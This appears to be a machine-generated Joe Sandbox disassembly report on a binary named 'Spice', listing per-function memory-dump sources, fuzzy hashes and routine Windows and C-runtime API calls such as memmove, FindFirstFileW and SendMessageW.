                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                                                                      • Opcode ID: ee2257c5a53d1f7d36a54657b59fbde584cce705b9be39a908738f9df03cff69
                                                                                                                                                                                                                                      • Instruction ID: 6f10ceaa91056dbb255c8743985478c83702f23647e3a119c7320eb4bb6a4a38
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee2257c5a53d1f7d36a54657b59fbde584cce705b9be39a908738f9df03cff69
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1211374508741DFCB24DF14C444B1ABBE0BF89308F059968F89A6B322D731E849DB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                                                                      • Opcode ID: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
                                                                                                                                                                                                                                      • Instruction ID: 602a9121e21446f184543e79847c4422cd9a6440835fe820df8ff7f73d229fb8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F01F9722017016EDB246F38DC02F67BBDCDB447A0F50956EF62EDA1D1EA31E5408790
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00EE4998
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EnvironmentVariable
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1431749950-0
                                                                                                                                                                                                                                      • Opcode ID: d2b8e3f6f15f3afba8776166d6bad976418ac2622b81f64d8431e5ac155e9109
                                                                                                                                                                                                                                      • Instruction ID: 85b5c08cbecd0ef489dafef84c12b1d07ca39fbf75d18657544414b33260a36d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2b8e3f6f15f3afba8776166d6bad976418ac2622b81f64d8431e5ac155e9109
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58F03175608109AFCB14FB65D846D9F77FCEF45720B005056F908AB2A1EE71AD41C760
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E90FE6: std::exception::exception.LIBCMT ref: 00E9101C
                                                                                                                                                                                                                                        • Part of subcall function 00E90FE6: __CxxThrowException@8.LIBCMT ref: 00E91031
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ED7CB4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Exception@8Throw_memsetstd::exception::exception
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 525207782-0
                                                                                                                                                                                                                                      • Opcode ID: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
                                                                                                                                                                                                                                      • Instruction ID: 4d9b7146cf42c1eb39dccb4b41bb62d5eafa935a249db0c77e5ad3e6a85a7205
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C01EF742082009FD721EF5CD941F4ABBE1AF59710F24949AF588AB3A2DB72A8018B91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E90FE6: std::exception::exception.LIBCMT ref: 00E9101C
                                                                                                                                                                                                                                        • Part of subcall function 00E90FE6: __CxxThrowException@8.LIBCMT ref: 00E91031
                                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00EADC8B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Exception@8Throw_memmovestd::exception::exception
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1602317333-0
                                                                                                                                                                                                                                      • Opcode ID: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
                                                                                                                                                                                                                                      • Instruction ID: d371c2d2f5eb8bfe171bd5b889395822a65fdb67d660f08b83fcf4139671f0e8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97F01DB4604201DFDB11DF68C981E15BBE1FF1A714B24949CE1899F3A2E733E911CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _fseek
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2937370855-0
                                                                                                                                                                                                                                      • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                                                                                                                                                      • Instruction ID: 9aee71fba35bf14b5deafcb819e1618e1fff61961609cc7748d390e42ee522ea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07F085B6400208FFDF159F84DC00DEBBBB9EB89324F00419CF9086A210D272EA218BA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00E827AF,?,00000001), ref: 00E84A63
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 8f62748935e5db18de02230ae17f5eecdf5bd516d2933a2fddf9296dd614cfce
                                                                                                                                                                                                                                      • Instruction ID: 54e714cb54cef118da65fa5341c3974bad168e8e23b513bb9baefecfbbf5af5d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f62748935e5db18de02230ae17f5eecdf5bd516d2933a2fddf9296dd614cfce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BF01CB1145706CFCB38AF64E490856BBF0FF14319310A9AEE1DE97651D7319944DF44
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __fread_nolock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2638373210-0
                                                                                                                                                                                                                                      • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                                                                                                                                                      • Instruction ID: 4fc347ff6eb85dda57c511fe8e85519a20446ea872d3d9f395168cce78a166ae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDF0F8B240020DFFDF05DF90C941EAABB79FB54314F209589FD199A252D336DA21AB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                                                                      • Opcode ID: 1e7102c16fd033f45a7c7e7dbf54e8c72b590eee8b8bb4d8f1e4baf1fd7619fb
                                                                                                                                                                                                                                      • Instruction ID: 183b1d706393f9d7956f82bbb5b19472520130d2099af7a32175d1f9433494ae
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e7102c16fd033f45a7c7e7dbf54e8c72b590eee8b8bb4d8f1e4baf1fd7619fb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEE02BB17083469EEB309B649404BA3FFD4EB00315F10A46ED499A1241E77668949BA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E909E4
                                                                                                                                                                                                                                        • Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongNamePath_memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2514874351-0
                                                                                                                                                                                                                                      • Opcode ID: 21823410992fbabe4c87581bb0080516edf0666b1a4e5c6f22b0eb1dee5c00dc
                                                                                                                                                                                                                                      • Instruction ID: b06555c949f8b95c337fe48f37442532a18c7c325235feda1f7e764c45f238f5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21823410992fbabe4c87581bb0080516edf0666b1a4e5c6f22b0eb1dee5c00dc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCE086369002285BC721A6989C06FEA77DDEB89690F0401F6FC0CD7244D960AC818691
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,00ED3BFE), ref: 00ED4FED
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: bb0b049b6b07e379126a2d0d96e5f4bbd1bbd68ff09fc02c7712f95a85a91ed4
                                                                                                                                                                                                                                      • Instruction ID: 13f40798d48daa830674918bde4eef4f505ed36b9c4f25bcfa9dc1f5e0678d7e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb0b049b6b07e379126a2d0d96e5f4bbd1bbd68ff09fc02c7712f95a85a91ed4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DB092B5200600579E281F3C19481A93301A9623ADBD83B82E478A56F19A39884FA520
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __wfsopen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 197181222-0
                                                                                                                                                                                                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                                                                                                      • Instruction ID: 03c0cbd8687455f1f58341d87f5a6fcb58bd0b75e088b2fc10a14d1a87113332
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62B0927644020CB7CE122A82EC03A593B699B40A68F408020FB1C2C162A673A6A09689
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00ED4005: FindFirstFileW.KERNEL32(?,?), ref: 00ED407C
                                                                                                                                                                                                                                        • Part of subcall function 00ED4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00ED40CC
                                                                                                                                                                                                                                        • Part of subcall function 00ED4005: FindNextFileW.KERNEL32(00000000,00000010), ref: 00ED40DD
                                                                                                                                                                                                                                        • Part of subcall function 00ED4005: FindClose.KERNEL32(00000000), ref: 00ED40F4
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00EDC292
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2191629493-0
                                                                                                                                                                                                                                      • Opcode ID: 644ec47776b35b91c1938a36a6475f0df904d21abedc8f0564d210a60006db19
                                                                                                                                                                                                                                      • Instruction ID: 63a2ce76cc34d45cce8287af0082608448d12729633040e2672b85f64ac1568e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 644ec47776b35b91c1938a36a6475f0df904d21abedc8f0564d210a60006db19
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CF082712105108FCB11EF59D840F5AB7E5EF44320F05C019FA49A7391CB70BC02CB94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00EFD208
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EFD249
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00EFD28E
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EFD2B8
                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00EFD2E1
                                                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 00EFD359
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00EFD37A
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000009), ref: 00EFD387
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EFD39D
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 00EFD3A7
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EFD3D0
                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00EFD3F7
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001030,?,00EFB9BA), ref: 00EFD4FD
                                                                                                                                                                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00EFD513
                                                                                                                                                                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EFD526
                                                                                                                                                                                                                                      • SetCapture.USER32(?), ref: 00EFD52F
                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00EFD594
                                                                                                                                                                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EFD5A1
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EFD5BB
                                                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 00EFD5C6
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EFD600
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00EFD60D
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EFD669
                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00EFD697
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EFD6D4
                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00EFD703
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EFD724
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EFD733
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00EFD753
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00EFD760
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00EFD780
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EFD7E9
                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00EFD81A
                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00EFD878
                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EFD8A8
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EFD8D2
                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00EFD8F5
